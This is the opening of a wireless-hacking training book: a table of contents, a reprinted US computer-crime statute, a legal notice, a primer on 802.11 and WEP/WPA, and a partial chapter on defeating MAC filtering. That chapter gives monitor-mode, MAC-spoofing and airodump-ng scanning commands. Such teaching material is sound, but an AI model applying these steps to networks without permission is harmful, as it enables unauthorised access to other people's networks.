PDF

HACKING SCHOOL
PRE SE NTS
Attacks on wireless networks.

Theory and practice.
Title: Attacks on wireless networks. Theory and practice.
ISBN: 978-83-923745-2-7
Copyright © by CSH Press.

All Rights Reserved.
Authors of the chapters herein: Mariusz Gliwinski (chapters 1–5),

Robert Dylewski (chapters 6–7).
All rights reserved. This publication is protected by copyright. No part

of this publication may be reproduced, stored in a retrieval system,
or transmitted, in any form or by any means, electronic, mechanical,
photocopying, recording or otherwise without the prior consent of the
publisher.
Company or product names mentioned herein are the trademarks or

registered trademarks of their respective owners.
The authors and the publisher have taken care to ensure the information in
this publication is reliable and complete, but cannot assume responsibility
for its use and for any related potential breach of patents or copyright.
The authors and the publisher cannot assume responsibility for any
consequences or damage in connection with the use of the information in
this publication.
CSH Press
82-500 Kwidzyn
Dluga 27, Poland
e-mail: contact@hackingschool.com
For newest info on the Hacking School project, please visit

http://www.HackingSchool.com.
Table of contents
Legal information . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
Chapter 1. Introduction to wireless networks . . . . . . . . . . . . . . . . . 19

Introduction ..................................................................... 19
Wireless transmission standards ........................................... 21
802.11 wireless network types .............................................. 24
Encryption and authentication standards .............................. 26
Wireless network interface cards in Linux ............................... 29
Chapter 2. Wireless security (half) measures:

An overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
MAC address filtering ......................................................... 31
Disabling ESSID broadcast .................................................. 36
Limiting wireless coverage .................................................. 38
Chapter 3. Wireless network attacks independent

of used encryption . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39
Introduction ..................................................................... 39
DoS: RF jamming ............................................................... 41
DoS: CSMA/CA jamming ..................................................... 43
DoS: Deauthentication attack .............................................. 44
Wireless MITM .................................................................. 46
4 Table of contents
Chapter 4. WEP attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47

WEP encryption ................................................................ 48
Chopchop ........................................................................ 52
Keystream reuse ................................................................ 56
Packetforge-ng ............................................................ 56
Easside-ng ................................................................... 64
FMS, KoreK attacks, PTW ......................... ............................ 69
Interactive packet replay ................................................ 75
ARP request replay attack ................... ............................ 77
Caffe Latte Attack .................................. ............................ 79
Chapter 5. WPA attacks . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . 81

Introduction ......................................... ............................ 81
WPA ................................................................................ 83
WPA2 .............................................................................. 88
Rainbow tables ..................................... ............................ 93
Cowpatty attack ................................................................ 95
DoS: Taking advantage of the MIC failure holdoff time .............. 97
Chapter 6. CUDA-powered attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 99

What is CUDA? ...................................... ............................ 99
Video cards: Not only for gaming? ................................... 100
Drivers and development environment configuration ............. 101
NVIDIA drivers ............................................................. 101
Installing CUDA-Toolkit and SDK .......... ........................... 105
Cowpatty ................................................................... 107
Pyrit ............................................... ........................... 108
Aircrack-ng ...................................... ........................... 115
GPU tweaking in Linux .................................................. 119
CUDA in action: WLAN attacks ............................................ 124
Test platform .............................................................. 124
Test files ..................................................................... 124
Preparing for an attack ................................................. 125
Pyrit: Hash table generation modes ...... ........................... 129
Benchmark analysis ...................................................... 139
Dictionaries ..................................... ........................... 141
Table of contents 5
Appendix A: CUDA-powered cracking of MD4/MD5 hashes ...... 146

What is MD5? .............................................................. 146
CUDA-Multiforcer ........................................................ 146
GPU MD5 Crack ........................................................... 151
Appendix B: Wardriving experiment .................................... 156
Hardware ................................................................... 156
Research methodology ................................................. 156
Results ....................................................................... 157
Summary ................................................................... 158
Chapter 7. Advanced attacks against WPA . . . . . . . . . . . . . . . . . . . . 159

WKA TKIP attack ............................................................... 159
Creating a packet ......................................................... 161
TKIP Sequence Counter ................................................. 163
Message Integrity Code (MIC) ........................................ 163
QoS: Quality of Service, Wi-Fi Multimedia: WMM ................ 164
TKIP attack ................................................................. 164
Requirements ............................................................. 164
Attack stages: ............................................................. 165
Countermeasures ........................................................ 168
WPA TKIP broken .............................................................. 169
Beck-Tews attack enhanced ................................................ 171
Michael Reset attack ......................................................... 175
Summary ........................................................................ 176
Chapter 8. Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 177
Chapter 9. References . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . 179

Legal information
This book and the software fragments included present techniques

thanks to which both IT environment can be protected by its user
as well as other systems can be attacked. The information serves
general information purposes and it may be subject to change at any
time.
Would like to draw your attention to the fact that this handbook,
live training movies and software included can be used only to
protect your IT environment. Conducting an attack on other IT
system without the permission of its respective owner is penalized
by the federal Computer Fraud and Abuse Act. If you live outside
the United States, please refer to your local law.
“(a) Whoever—
(1) having knowingly accessed a computer without authorization or
exceeding authorized access, and by means of such conduct having
obtained information that has been determined by the United States
Government pursuant to an Executive order or statute to require
protection against unauthorized disclosure for reasons of national defense
or foreign relations, or any restricted data, as defined in paragraph y.
8 Legal information
of section 11 of the Atomic Energy Act of 1954, with reason to believe that
such information so obtained could be used to the injury of the United
States, or to the advantage of any foreign nation willfully communicates,
delivers, transmits, or causes to be communicated, delivered, or
transmitted, or attempts to communicate, deliver, transmit or cause to
be communicated, delivered, or transmitted the same to any person not
entitled to receive it, or willfully retains the same and fails to deliver it to
the officer or employee of the United States entitled to receive it;
(2) intentionally accesses a computer without authorization or exceeds
authorized access, and thereby obtains—
(A) information contained in a financial record of a financial
institution, or of a card issuer as defined in section 1602 (n) of title 15,
or contained in a file of a consumer reporting agency on a consumer,
as such terms are defined in the Fair Credit Reporting Act
(15 U.S.C. 1681 et seq.);
(B) information from any department or agency of the United States;
or
(C) information from any protected computer;
(3) intentionally, without authorization to access any nonpublic
computer of a department or agency of the United States, accesses such
a computer of that department or agency that is exclusively for the use
of the Government of the United States or, in the case of a computer not
exclusively for such use, is used by or for the Government of the United
States and such conduct affects that use by or for the Government of the
United States;
(4) knowingly and with intent to defraud, accesses a protected computer
without authorization, or exceeds authorized access, and by means of such
conduct furthers the intended fraud and obtains anything of value, unless
the object of the fraud and the thing obtained consists only of the use of
the computer and the value of such use is not more than $5,000 in any
1-year period;
(5)
(A) knowingly causes the transmission of a program, information,
code, or command, and as a result of such conduct, intentionally
causes damage without authorization, to a protected computer;
9
(B) intentionally accesses a protected computer without authorization,

and as a result of such conduct, recklessly causes damage; or
(C) intentionally accesses a protected computer without authorization,
and as a result of such conduct, causes damage and loss.
(6) knowingly and with intent to defraud traffics (as defined in
section 1029) in any password or similar information through which a
computer may be accessed without authorization, if—
(A) such trafficking affects interstate or foreign commerce; or
(B) such computer is used by or for the Government of the United
States;
(7) with intent to extort from any person any money or other thing of
value, transmits in interstate or foreign commerce any communication
containing any—
(A) threat to cause damage to a protected computer;
(B) threat to obtain information from a protected computer
without authorization or in excess of authorization or to impair the
confidentiality of information obtained from a protected computer
without authorization or by exceeding authorized access; or
(C) demand or request for money or other thing of value in relation
to damage to a protected computer, where such damage was caused to
facilitate the extortion;
shall be punished as provided in subsection (c) of this section.
(b) Whoever conspires to commit or attempts to commit an offense under

subsection (a) of this section shall be punished as provided in subsection
(c) of this section.
(c) The punishment for an offense under subsection (a) or (b) of this
section is—
(1)
(A) a fine under this title or imprisonment for not more than ten years,
or both, in the case of an offense under subsection (a)(1) of this section
which does not occur after a conviction for another offense under this
section, or an attempt to commit an offense punishable under this
subparagraph; and
10 Legal information
(B) a fine under this title or imprisonment for not more than twenty
years, or both, in the case of an offense under subsection (a)(1) of this
section which occurs after a conviction for another offense under this
subparagraph;
(2)
(A) except as provided in subparagraph (B), a fine under this title or
imprisonment for not more than one year, or both, in the case of an
offense under subsection (a)(2), (a)(3), or (a)(6) of this section which
does not occur after a conviction for another offense under this
subparagraph;
(B) a fine under this title or imprisonment for not more than 5 years, or
both, in the case of an offense under subsection (a)(2), or an attempt to
commit an offense punishable under this subparagraph, if—
(i) the offense was committed for purposes of commercial
advantage or private financial gain;
(ii) the offense was committed in furtherance of any criminal or
tortious act in violation of the Constitution or laws of the United
States or of any State; or
(iii) the value of the information obtained exceeds $5,000; and
(C) a fine under this title or imprisonment for not more than ten
years, or both, in the case of an offense under subsection (a)(2),
(a)(3) or (a)(6) of this section which occurs after a conviction for
another offense under this section, or an attempt to commit an
offense punishable under this subparagraph;
(3)
(A) a fine under this title or imprisonment for not more than five years,
or both, in the case of an offense under subsection (a)(4) or (a)(7) of this
section which does not occur after a conviction for another offense
under this section, or an attempt to commit an offense punishable
under this subparagraph; and
(B) a fine under this title or imprisonment for not more than ten years,
or both, in the case of an offense under subsection (a)(4), or (a)(7) of
this section which occurs after a conviction for another offense under
11
this section, or an attempt to commit an offense punishable under this

subparagraph;
(4)
(A) except as provided in subparagraphs (E) and (F), a fine under this
title, imprisonment for not more than 5 years, or both, in the case of—
(i) an offense under subsection (a)(5)(B), which does not occur after
a conviction for another offense under this section, if the offense
caused (or, in the case of an attempted offense, would, if completed,
have caused)—
(I) loss to 1 or more persons during any 1-year period (and, for
purposes of an investigation, prosecution, or other proceeding
brought by the United States only, loss resulting from
a related course of conduct affecting 1 or more other protected
computers) aggregating at least $5,000 in value;
(II) the modification or impairment, or potential modification
or impairment, of the medical examination, diagnosis,
treatment, or care of 1 or more individuals;
(III) physical injury to any person;
(IV) a threat to public health or safety;
(V) damage affecting a computer used by or for an entity of the
United States Government in furtherance of the administration
of justice, national defense, or national security; or
(VI) damage affecting 10 or more protected computers during
any 1-year period; or
(ii) an attempt to commit an offense punishable under this
subparagraph;
(B) except as provided in subparagraphs (E) and (F), a fine under this
title, imprisonment for not more than 10 years, or both, in the case of—
(i) an offense under subsection (a)(5)(A), which does not occur after
a conviction for another offense under this section, if the offense
caused (or, in the case of an attempted offense, would, if completed,
have caused) a harm provided in subclauses (I) through (VI) of
subparagraph (A)(i); or
subparagraph;
(C) except as provided in subparagraphs (E) and (F), a fine under this

title, imprisonment for not more than 20 years, or both, in the case
of—
(i) an offense or an attempt to commit an offense under
subparagraphs (A) or (B) of subsection (a)(5) that occurs after
a conviction for another offense under this section; or
(ii) an at tempt to commit an offense punishable under this
subparagraph;
(D) a fine under this title, imprisonment for not more than 10 years, or
both, in the case of—
(i) an offense or an attempt to commit an offense under subsection
(a)(5)(C) that occurs after a conviction for another offense under
this section; or
subparagraph;
(E) if the offender attempts to cause or knowingly or recklessly causes
serious bodily injury from conduct in violation of subsection (a)(5)(A),
a fine under this title, imprisonment for not more than 20 years, or
both;
(F) if the offender attempts to cause or knowingly or recklessly causes
death from conduct in violation of subsection (a)(5)(A), a fine under
this title, imprisonment for any term of years or for life, or both; or
(G) a fine under this title, imprisonment for not more than 1 year, or
both, for—
(i) any other offense under subsection (a)(5); or
subparagraph.
(d)
(1) The United States Secret Service shall, in addition to any other agency
having such authority, have the authority to investigate offenses under this
section.
(2) The Federal Bureau of Investigation shall have primary authority
to investigate offenses under subsection (a)(1) for any cases involving
espionage, foreign counterintelligence, information protected against
13
unauthorized disclosure for reasons of national defense or foreign

relations, or Restricted Data (as that term is defined in section 11y of
the Atomic Energy Act of 1954 (42 U.S.C. 2014 (y)), except for offenses
affecting the duties of the United States Secret Service pursuant to
section 3056 (a) of this title.
(3) Such aut hority shall be exercised in accordance with an agreement
which shall be entered into by the Secretary of the Treasury and the
Attorney General.
(e) As used in this section—

(1) the term “computer” means an electronic, magnetic, optical,
electrochemical, or other high speed data processing device performing
logical, arithmetic, or storage functions, and includes any data storage
facility or communications facility directly related to or operating
in conjunction with such device, but such term does not include an
automated typewriter or typesetter, a portable hand held calculator,
or other similar device;
(2) the term “protected computer” means a computer—
(A) exclusively for the use of a financial institution or the United States
Government, or, in the case of a computer not exclusively for such use,
used by or for a financial institution or the United States Government
and the conduct constituting the offense affects that use by or for the
financial institution or the Government; or
(B) which is used in or affecting interstate or foreign commerce or
communication, including a computer located outside the United
States that is used in a manner that affects interstate or foreign
commerce or communication of the United States;
(3) the term “State” includes the District of Columbia, the Commonwealth
of Puerto Rico, and any other commonwealth, possession or territory of
the United States;
(4) the term “ financial institution” means—
(A) an institution, with deposits insured by the Federal Deposit
Insurance Corporation;
(B) the Federal Reserve or a member of the Federal Reserve including
any Federal Reserve Bank;
(C) a credit union with accounts insured by the National Credit Union
Administration;
(D) a member of the Federal home loan bank system and any home
loan bank;
(E) any institution of the Farm Credit System under the Farm Credit
Act of 1971;
(F) a broker-dealer registered with the Securities and Exchange
Commission pursuant to section 15 of the Securities Exchange Act
of 1934;
(G) the Securities Investor Protection Corporation;
(H) a branch or agency of a foreign bank (as such terms are defined in
paragraphs (1) and (3) of section 1(b) of the International Banking Act
of 1978); and
(I) an organization operating under section 25 orsection 25(a)
of the Federal Reserve Act;
(5) the term “f inancial record” means information derived from
any record held by a financial institution pertaining to a customer’s
relationship with the financial institution;
(6) the term “exceeds authorized access” means to access a computer with
authorization and to use such access to obtain or alter information in the
computer that the accesser is not entitled so to obtain or alter;
(7) the term “department of the United States” means the legislative or
judicial branch of the Government or one of the executive departments
enumerated in section 101 of title 5;
(8) the term “da mage” means any impairment to the integrity
or availability of data, a program, a system, or information;
(9) the term “government entity” includes the Government of the
United States, any State or political subdivision of the United States, any
foreign country, and any state, province, municipality, or other political
subdivision of a foreign country;
(10) the term “conviction” shall include a conviction under the law of any
State for a crime punishable by imprisonment for more than 1 year, an
element of which is unauthorized access, or exceeding authorized access,
to a computer;
15
(11) the term “loss” means any reasonable cost to any victim, including the
cost of responding to an offense, conducting a damage assessment, and
restoring the data, program, system, or information to its condition prior
to the offense, and any revenue lost, cost incurred, or other consequential
damages incurred because of interruption of service; and
(12) the term “person” means any individual, firm, corporation,
educational institution, financial institution, governmental entity, or legal
or other entity.
(f) This section does not prohibit any lawfully authorized investigative,

protective, or intelligence activity of a law enforcement agency
of the United States, a State, or a political subdivision of a State, or of an
intelligence agency of the United States.
(g) Any person who suffers damage or loss by reason of a violation

of this section may maintain a civil action against the violator to obtain
compensatory damages and injunctive relief or other equitable relief.
A civil action for a violation of this section may be brought only if the
conduct involves 1 of the factors set forth in subclauses(I), (II), (III), (IV),
or (V) of subsection (c)(4)(A)(i). Damages for a violation involving only
conduct described in subsection (c)(4)(A)(i)(I) are limited to economic
damages. No action may be brought under this subsection unless such
action is begun within 2 years of the date of the act complained of or the
date of the discovery of the damage. No action may be brought under this
subsection for the negligent design or manufacture of computer hardware,
computer software, or firmware.
(h) The Attorney General and the Secretary of the Treasury shall report
to the Congress annually, during the first 3 years following the date of the
enactment of this subsection, concerning investigations and prosecutions
under subsection (a)(5).
(i)
(1) The court, in imposing sentence on any person convicted of a violation
of this section, or convicted of conspiracy to violate this section, shall
order, in addition to any other sentence imposed and irrespective of any

provision of State law, that such person forfeit to the United States—
(A) such person’s interest in any personal property that was used
or intended to be used to commit or to facilitate the commission of
such violation; and
(B) any property, real or personal, constituting or derived from, any
proceeds that such person obtained, directly or indirectly, as a result of
such violation.
(2) The criminal forfeiture of property under this subsection, any seizure
and disposition thereof, and any judicial proceeding in relation thereto,
shall be governed by the provisions of section 413 of the Comprehensive
Drug Abuse Prevention and Control Act of 1970 (21 U.S.C. 853), except
subsection (d) of that section.
(j) For purposes of subsection (i), the following shall be subject

to forfeiture to the United States and no property right shall exist in them:
(1) Any personal property used or intended to be used to commit or to
facilitate the commission of any violation of this section, or a conspiracy
to violate this section.
(2) Any property, real or personal, which constitutes or is derived from
proceeds traceable to any violation of this section, or a conspiracy to
violate this section.”
While being an administrator and using the tools described in the

handbook in order to protect your own IT environment, or gettin to
know the hacking techniques presented, you always have to be sure
that your actions are fully legal. The points below should be treated
as examples, not as a full and complete list:
– If you discover any new problem or lack of security in the
tested environment, you have to inform the administrator.
– You have to be really careful during the testing, any third

person cannot be harmed by your actions. If you accidentally
17
enter any other IT system during your tests, you have to cease
them and inform the administrator.
– All tests should have a complete documentation: the test, its

aim, plan, people taking part in it.
– The results of the tests should be kept away from any third
person.
– Tests conducted for any third person should be carried out

only after obtaining a written permission.
– Only testing environment should be used to conduct

the tests.
Additional legal info can be found in the full text of the federal
Computer Fraud and Abuse Act. Please note that the information
stated herein is valid at the time of publication and it may be subject
to change at any time.
1
Chapter 1
Introduction
to wireless networks
Chapter outline:
1. Introduction
2. Wireless transmission standards
3. Wireless network types
4. Encryption and authentication standards
5. Wireless network interface cards in Linux
Introduction
Anyone using the Internet is well-aware of all wireless networking
hiccups and internal flaws. We are annoyed with network
downtimes and the increased break-in likelihood (the traditional
wired networks are less susceptible in that regard). There can
be many different outcomes of an intrusion. Usually, the damage
to be feared is data loss – but keep in mind eavesdroppers can
20 Chapter 1 – Introduction to wireless networks
capture your confidential files and passwords as well. Moreover,

a perpetrator can log into your network and use your IP address to
break into other servers. The latter attacks are on the rise as many
legal systems worldwide are unclear about the liability connected to
this type of break-in.
This book provides a short primer into the theory of wireless

networking and discusses the relevant terminology and standards.
We aim to walk you through an example of what breaking into
a WLAN (Wireless Local Area Network) can look like step by step,
and give you tips and methods for effective network security.
You need:
– basic knowledge of cryptography

– grasp of the Linux console
You’ll learn:
– the ABC’s of wireless networks

– attacks on wireless networks (WEP- and WPA-encrypted
networks)
– how to secure wireless networks against attacks
Wireless transmission standards 21
Wireless transmission standards

If networking products shipped by different manufacturers are to be
able to communicate with each other, they need to share parameters
related to signal and data transfer mode. These settings are defined
in networking standards, a set of communication specifications
for networks. An example is IEEE 802.3 (or Ethernet, as it is widely
known). IEEE 802.3 is a staple in wired local area network solutions.
Standard specifications in general are laid out by the non-profit
association Institute of Electrical and Electronics Engineers (lending
its acronym, IEEE, to the standard names).
802.11 is the general standard for transmitting data over radio.

The technology exists in several amended variants denoted by
a letter (a, b, g, n and so on), which focus principally on the technical
aspects of wireless information transfer. For the average user, the
parameters that are meaningful include data rate, frequency, and
range, and often the choice of a standard is a matter of buying a piece
of gear that uses it. As for the difference in using devices that support
the other standards that will be mentioned: overall, there are none.
Wireless transmission takes place through the open air within the
public, unlicensed 2.4 and 5 GHz frequency bands. The devices
using the ‘barebones’ version of the 802.11 protocol provide the
achievable data rate of up to 2Mbps with a frequency band in the
range of 2.4–2.5 GHz. Gradually however, this protocol would gain
new letter designations added as suffixes that represent the latest
standard modifications.
802.11 evolved into the 802.11a standard with the frequency

doubled to 5 GHz. Due to weak signal and high power consumption,
the technology failed to make its mark and spread with the average
user. Still, it did become popular with Internet providers due to
its boosted transfer speed (up to 54Mbps). It also offered a relative

upgrade in range, which you can study in the table below.
802.11a
data rate [MB/s] 12 24 36 48 54
range [m] 150 80 50 30 15
802.11b
data rate [MB/s] 2 5,5 11
range [m] 150 90 45
Figure 1: Data rates
The first major standard update to catch on was 802.11b, and even
today devices that use this networking technology have not been
fully superseded. The strength of 802.11b was longer range, resulting
from a lowered frequency (at 2.4 GHz). The max speed is 11 Mbps,
but usable data (meaningful information, as opposed to for example
lost packets) only equals half of sent data.
802.11g is the successor to 802.11b and is backward compatible

with the 11b standard. As a result, the 11b and 11g equipment is able
to communicate. If just a single 802.11b receiver is on your network,
transmission speed (as high as 54 Mbps in normal conditions) drops
to 11 Mbps. To ensure compatibility, signal is emitted in the 2.4 GHz
range. The 802.11g networking devices remain the most prevalent
today.
The last and latest 802.11 standard enhancement is 802.11n.

The protocol achieves a stronger data rate of even up to 300 Mbps
today (with more than 100 Mbps of usable data).
The simultaneous use of multiple channels works to uphold the high

speed of transmission. This bears the question, what about the rest
of the bandwidth? Why only a third of the throughput constitutes
data that is of interest to network users? The answer is simple:
Wireless transmission standards 23
besides files and data used by application (goodput), throughput also

includes protocol overhead: addresses, checksums and other packets
that serve to ensure the validity of sent information.
First and foremost, wireless networks are not isolated from one
another by any means (like a cable can provide isolation in wired
networks). By contrast, wireless networks all share a medium, which
is the air. Very often neighboring residences or organizations set up
separate Internet connectivity. Channels have been developed to
negate the effects of antennas overlapping and causing interference.
Consider the way cellular networks, television or the radio
technology works with radio waves emitted over a shared medium,
the open air: nonetheless two or more wireless networks do not
create interference. The simple cause for this is that the signals are
broadcast over different frequencies: this is the reason we talk of the
2.4–2.5 GHz band rather than a specific frequency.
The 802.11b networks have 14 channels in the 2.4 GHz range,

however only Channels 1 and 11 are legal to use in the USA
(respective channel widths 2.401–2.423 GHz and 2.451–2.473 GHz).
Recent developments in wireless networking include a channel
bonding technology called Super G. This proprietary solution
achieves a gross data rate of 108 Mbps; however, Super G cannot be
used to its full potential on many devices.
802.11 wireless network types

At the start, let’s try to delineate the very broad term Wi-Fi (Wireless
Fidelity). In general, Wi-Fi is a set of standards for wireless local area
networks (WLANs). Wireless outperforms wired technologies by
losing tangled cables and offering easier non-PC (laptop, notebook,
smartphone, etc.) connectivity and more. As any convenience,
Wi-Fi suffers from its share of drawbacks, including range issues,
transmission failures or remote network attacks.
WLANs operate in two modes. The first is Ad Hoc (‘for this’ in

Latin). In this type of network, all devices have equal status. Each
device on a network is a node that forwards information (packets)
communicated over other stations. The Ad Hoc mode benefits from
a decentralized architecture and does not require specialist network
management hardware. The major downside is poorer performance
as the number of clients on a network rises.
The other mode is Managed (or Infrastructure). At its core is one

or more access points (APs) serving to authorize and forward
information to its destinations. Each client on a network must be in
range of an access point. The Managed mode is an equivalent of the
wired star network, with each client connecting to an access point.
The AP works like a switch connected to the Internet via a cable.
The issues of range and reach are more emphatic here than with
other networks (such as GSM). A primary concern is keeping
two devices that want to communicate over the network in close
proximity: they need to ‘see’ each other. In practice, this means
that when you stand next to your AP and look at your computer
(equipped with a wireless network interface card), it must be
within your eyesight (that said, a thin wall or a glass door are not
big roadblocks in transmission). No obstacles like thick walls or
interfering devices must be in between these objects. If there is no
802.11 wireless network types 25
obvious way you can plan your network to avoid these obstacles and
if waves cannot bounce off them and propagate in a room, consider
setting up an additional AP to work as a bridge between the initial
AP and an end point.
The figure below depicts a topology example for clients in range of

a wireless network. Wi-Fi signal does not reach the host inside the
prohibitory sign. The arrow hue represents the strength of the signal:
the deeper it is, the better the signal. Wall openings, for instance
doors or windows, is the medium that lets radio waves through.
Figure 2: WLAN signal transmission

Encryption and authentication

standards
If you have ever configured an access point, you probably wondered
about the WEP, WPA-PSK, WPA-CCMP or WPA2 acronyms.
Depending on the gear model, the name combinations will differ,
although fundamentally they define three security considerations:
encryption protocols, authentication protocols and encryption
algorithms.
WEP (Wired Equivalent Privacy) has been used as far back as

the first version of 802.11. As the oldest encryption protocol, it is
also the least secure of available options: however, it is better to
have some security rather than no security at all. At the core of
WEP security are four fixed keys configured by an administrator
(in most devices it is a transparent setting and users do not know
it exists). Realistically, only one is used. If WEP is the selected
protocol, the available authentication modes are OSA (Open
System Authentication) and SKA (Shared Key Authentication).
Authentication is required to allow an access point to forward
information received from a client. If Open System Authentication
is selected, a client that wants to join a network sends an
authentication request and the access point always responds
positively.
In Shared Key Authentication the client is required to know

the network key. WEP provides 64-bit or 128-bit encryption. You
submit a 40-bit key (8 bytes) with the former, while the 128-bit WEP
uses a 104-bit key (13 bytes) with 24 bits assigned for initialization
vectors.
The 802.11i standard was created as a response to WEP’s numerous

deficiencies. WPA (Wi-Fi Protected Access) is an implementation
Encryption and authentication standards 27
of the standard, which enhances and updates the encryption model

and introduces a new authentication mode, operating with the
use of an external server. The SKA mode is changed to PSK (Pre-
Shared Key), with no perceptible makeover in the encryption for
the user. The same password is entered on each network client at
setup and this password is used for data transfer. Interestingly, even
if an attacker obtains the key, there is no way to eavesdrop on other
transmissions over the WLAN.
In accordance with its specifications, WPA may use 802.1X.

The 802.1X authentication involves a separate authentication
server (for example, RADIUS). WPA-PSK and WPA-MGT are also
referred to as respectively WPA Personal and WPA Enterprise.
Another change that came with 802.11i is the replacement of the
RC4 encryption algorithm with CCMP, an encryption mechanism
based on AES (Advanced Encryption Standard). CCMP, despite
being more secure, requires much more processing power than its
predecessor (RC4) and thus is not a good match for a lot of older
gear. The full 802.11i implementation is WPA2. WPA meanwhile is
the less secure variant that uses RC4. Note that the NSA (National
Security Agency) has deemed AES as secure. AES is often the option
chosen for file system-level encryption. When a sufficiently long key
is used in this algorithm, not even the police or intelligence agencies
are able to read the data it has scrambled.
An optional cipher in the standard is WRAP, also a variant of AES.

It was not included in the standard as mandatory due to licensing
problems.
Below is a table comparing encryption protocols, authentication

modes and encryption algorithms:
Standard Authentication Encryption

Open system OPEN (none) OPEN (none)
WEP OPEN (none) 40-bit WEP
SKA (shared key) 104-bit WEP
WPA OPEN (none) TKIP
PSK (WPA Personal)
MGT (WPA Enterprise)
WPA2 OPEN (none) TKIP
PSK (WPA2 Personal) CCMP (AES)
MGT (WPA2 Enterprise) WRAP
Wireless network interface cards in Linux 29
Wireless network interface cards

in Linux
All devices in the Linux operating system have an interface that
controls them. The devices include also network card. Naturally,
every card on a network has an interface. Run the command below
to make sure which interface can be used to control your network
card:
# airmon-ng
The output is a list of interfaces with associated devices. An example:
Interface Chipset Driver

wlan1 Ralink USB rt73
Wlan1 is the interface name. Depending on system configuration,

other common names are ‘wlan0’, ‘rausb0’ or ‘ath0’. You can also use
the iwconfig command to control or list available wireless network
interface cards.
Most wireless network interface cards can operate in at least two

modes today. The first is the managed mode: the card passes only
the traffic addressed to its interface. In the promiscuous mode, all
received packets are allowed through, including traffic addressed
to other hosts on the network. The last wireless card mode is the
monitor mode. Similar to promiscuous, this mode also allows
traffic not addressed to your network. Unfortunately, the support
for the monitor mode on network cards is limited. The monitor
mode captures packets without having to associate with an AP or
an ad hoc computer, which makes it more of a challenge to detect an
intrusion.
It can be harder to obtain Linux drivers for some network

cards. Among the least problematic are wireless cards with
the built-in Atheros, Ralink and Prism chipsets. Note that
the monitor mode is necessary for cracking wireless keys.
If you use ndiswrapper to emulate Windows drivers on Linux,
you will not be able to test any of the attack recipes outlined
in the book. Original Microsoft drivers disable the use
of the monitor mode: you can download appropriate drivers at
https://mypeek.wildpackets.com/driver _ downloads.php, but
the site does not cover all wireless network interface card models.
To change a wireless network interface card mode, run this

command:
# iwconfig wlan1 mode monitor
The parameters:
iwconfig: the program that configures a wireless network

interface
wlan1: the wireless network interface name
mode: sets the operating mode of the device (type a selected mode)
monitor: the set operating mode; besides monitor also managed

and promiscuous can be set
2
Chapter 2
Wireless security
(half) measures:
An overview
Chapter outline:
1. MAC address filtering
2. Disabling ESSID broadcast
3. Limiting wireless coverage
MAC address filtering

A sniffer is an application designed to eavesdrop (or sniff) on
network traffic. With it, you might be able to capture any network
packet provided some conditions are met.
One of the access point security tactics is enabling MAC address

filtering. When you try to authenticate with a network and get no
response, it probably means you are out of range of the wireless
signal. But the other possibility is that the network administrator
has enabled the MAC address filtering feature. But how can
32 Chapter 2 – Wireless security (half) measures: An overview
a black-hat hacker impersonate a rightful client to access a targeted

network? Let’s explain this by looking at the hacker’s actions step by
step.
First, some background. A MAC address is a unique hardware

identifier on a wired or wireless network much like an IP address is
a unique identifier in the Internet. The theory is that every network
card should have a unique MAC address burned into it. The MAC
address is 6 bytes in length separated by colons: check below to
see what it looks like. While occasionally MAC addresses will be
duplicated in a pool, this incident is very rare in WLANs.
An ever-widening collection of software can allow you to freely

spoof the MAC address values, and because of this it is unwarranted
to rely on an approved MAC address list of networking gear that
can be authenticated as a security silver bullet. Let’s see how this
countermeasure can be obliterated.
To spoof a MAC address in Linux, simply run this command:
# ifconfig wlan1 hw ether 00:0F:B5:34:30:30
The parameters:
ifconfig: the program that configures a wireless network

interface
hw ether: the option sets the MAC address of the interface
00:0F:B5:34:30:30: the new MAC address to set
Right: you know that a MAC address can be forged and know how
to spoof it. But what hardware address should be selected? The new
MAC address filtering 33
address must be in the MAC address pool assigned for the network.
All you need to do is to check available MAC addresses in the pool.
The tool for the job is the airodump-ng application (to be precise,
a sniffer). The program can look up the hardware addresses of
hosts that are active at the time of running it. Before you start it,
the interface operating mode needs to be set to monitor. Run this
command:
# iwconfig wlan1 mode monitor
The parameters:
mode monitor: the mode name to be set
Airodump-ng can begin the scanning:
# airodump-ng wlan1
The parameters:
airodump-ng: the sniffer name
wlan1: sets the interface to be used to monitor wireless activity
Before we go any further, there are some errors that can crop up as
early as this stage. If you have not taken care to get the right drivers,
your wireless network interface will not be set in monitor mode,
prompting an error message.
The second of the commands we discussed starts the sniffer.

The role of this application is to scan on selected channels (a wireless
card can receive data on one channel at a time). The first line shows
the currently scanned channel, elapsed running time and current
date and time. The next line provides titles for each column, and the
lines after it show detected access points.
CH 3 ][ Elapsed: 1 min ][ 2014-04-16 14:38

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:19:5B:B3:##:## 206 74 12 0 6 54. OPN <length: 0>
00:1E:E5:8D:##:## 205 5 0 0 9 54 WPA2 CCMP PSK ..
00:19:E0:A4:##:## 206 95 2 0 8 54. WEP WEP ###.###net.com
00:15:E9:E4:##:## 194 46 0 0 6 54. OPN Di
00:16:41:8E:##:## 177 10 0 0 10 54 WEP WEP #dslprovider##d
BSSID STATION PWR Rate Lost Packets Probes
00:19:5B:B3:##:## 00:0E:2E:CE:##:## 202 0- 0 0 12
Here’s a quick explanation of the fields:
BSSID: the basic service set identification; here it is equivalent to

the MAC address of the access point
PWR: signal level (power)
Beacons: number of captured ESSID broadcasts
#Data: number of captured data packets
#/s: number of #Data packets per second
CH: number of the channel used by the network
MB: maximum transfer (as specified in the standard)
ENC: used encryption (OPN/WEP/WPA/WPA2)
CIPHER: used cipher (WEP/WEP40/WEP104/TKIP/CCMP/

WRAP)
AUTH: used authentication protocol (SKA/PSK/MGT)
ESSID: the wireless network name

MAC address filtering 35
The second section lists client stations:
BSSID: the MAC address of the access point the client is associated
with
STATION: the MAC address of the client
PWR: signal level (its range depends on the card driver: the higher
